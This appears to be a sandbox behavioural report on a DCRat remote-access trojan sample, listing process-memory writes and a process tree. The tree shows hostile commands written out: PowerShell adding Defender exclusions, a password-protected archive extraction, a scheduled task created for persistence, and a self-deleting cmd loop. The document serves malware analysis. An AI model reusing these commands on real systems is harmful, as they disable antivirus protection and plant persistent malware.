PID 2972 wrote to memory of 1904	2972	DCRat.exe	Hyfatok.exe
PID 2972 wrote to memory of 1904	2972	DCRat.exe	Hyfatok.exe
PID 2972 wrote to memory of 1904	2972	DCRat.exe	Hyfatok.exe
PID 2972 wrote to memory of 1056	2972	DCRat.exe	WerFault.exe
PID 2972 wrote to memory of 1056	2972	DCRat.exe	WerFault.exe
PID 2972 wrote to memory of 1056	2972	DCRat.exe	WerFault.exe
PID 1664 wrote to memory of 2980	1664	SetupUDPDriver.exe	CL_Debug_Log.txt
PID 1664 wrote to memory of 2980	1664	SetupUDPDriver.exe	CL_Debug_Log.txt
PID 1664 wrote to memory of 2980	1664	SetupUDPDriver.exe	CL_Debug_Log.txt
PID 1664 wrote to memory of 2980	1664	SetupUDPDriver.exe	CL_Debug_Log.txt
PID 2972 wrote to memory of 2820	2972	DCRat.exe	SetupTCPIP6Driver.exe
PID 2972 wrote to memory of 2820	2972	DCRat.exe	SetupTCPIP6Driver.exe
PID 2972 wrote to memory of 2820	2972	DCRat.exe	SetupTCPIP6Driver.exe
PID 2972 wrote to memory of 2820	2972	DCRat.exe	SetupTCPIP6Driver.exe
PID 2972 wrote to memory of 2820	2972	DCRat.exe	SetupTCPIP6Driver.exe
PID 2972 wrote to memory of 2820	2972	DCRat.exe	SetupTCPIP6Driver.exe
PID 2972 wrote to memory of 2820	2972	DCRat.exe	SetupTCPIP6Driver.exe
PID 2972 wrote to memory of 988	2972	DCRat.exe	powershell.exe
PID 2972 wrote to memory of 988	2972	DCRat.exe	powershell.exe
PID 2972 wrote to memory of 988	2972	DCRat.exe	powershell.exe
PID 1664 wrote to memory of 2708	1664	SetupUDPDriver.exe	cmd.exe
PID 1664 wrote to memory of 2708	1664	SetupUDPDriver.exe	cmd.exe
PID 1664 wrote to memory of 2708	1664	SetupUDPDriver.exe	cmd.exe
PID 1664 wrote to memory of 2708	1664	SetupUDPDriver.exe	cmd.exe
PID 2708 wrote to memory of 2440	2708	cmd.exe	schtasks.exe
PID 2708 wrote to memory of 2440	2708	cmd.exe	schtasks.exe
PID 2708 wrote to memory of 2440	2708	cmd.exe	schtasks.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

5004 attrib.exe

pid	process
5004	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\dcrat\123.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Users\Admin\AppData\Local\Temp\dcrat\DCRat.exe
  DCRat.exe
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dcrat\DCRatLauncher.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1412
- - C:\Users\Admin\AppData\Local\Temp\dcrat\DCRatLauncher.exe
    "C:\Users\Admin\AppData\Local\Temp\dcrat\DCRatLauncher.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2472
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://java.com/download
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1808
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1808 CREDAT:275457 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1068
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1808 CREDAT:472072 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2228
- - C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exe
    "C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1664
  - - C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
      C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2980
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2708
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
        5⤵
        Creates scheduled task(s)
        
        PID:2440
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c For /L %i In (0,0,0) Do (del "C:\Users\Admin\AppData\Local\Temp\SETUPU~1.EXE"&&timeout /t 0&&if not exist "C:\Users\Admin\AppData\Local\Temp\SETUPU~1.EXE" exit)
      4⤵
      PID:1064
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2860
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3016
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:332
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1008
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2700
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:312
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2068
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2272
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1788
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2492
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2444
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2968
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2584
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:320
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1184
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2456
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2216
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:616
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1544
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:996
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1632
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1196
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1276
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:400
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1972
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1952
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2960
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2272
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2188
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1700
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1612
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2236
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1728
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1828
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2524
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:796
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1824
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1968
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:932
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2532
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2720
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1788
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1656
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2800
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1604
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2612
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2444
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2640
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1660
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1156
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1000
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2224
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:676
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2912
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2580
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3060
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:296
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1512
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2276
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:320
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2844
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1696
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:792
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:996
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2132
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1928
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2312
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1960
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2976
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2272
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1496
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1712
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1828
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2860
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2576
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1888
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2552
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1788
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:548
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2800
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2612
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2452
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1660
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2232
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2968
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2580
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1484
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2832
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2276
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2700
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1696
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:996
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:400
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1972
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2976
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2272
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1496
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2156
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2860
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1888
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:796
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2640
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1972
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1828
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1968
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2832
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:996
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3112
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3196
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3304
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3356
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3368
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3396
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3412
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3424
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3436
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3452
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3472
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3564
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3592
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3604
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3620
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3640
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3656
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3672
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3700
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3724
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3736
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3748
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3768
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3780
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3792
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3808
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3820
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3836
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3848
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3860
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3880
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3892
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3908
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3920
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3936
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3948
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3960
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3976
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3992
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4004
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4020
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4032
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4044
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4060
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4072
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4088
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2968
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:996
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3164
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2040
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3084
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3200
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3236
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3252
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3180
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3208
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1496
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2136
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2232
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3288
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1000
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3228
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3152
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3104
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3356
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3368
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3412
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3456
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3488
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3592
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3604
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3644
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3656
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3728
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3752
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3768
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3792
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3824
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3840
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3864
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3880
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1520
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3920
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3872
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3960
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3992
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1972
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4032
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4064
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4092
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1928
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3412
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3880
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4048
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3416
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3524
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3880
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3256
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3820
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3180
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3880
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1000
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3556
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3424
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1432
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4008
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3192
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3104
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3464
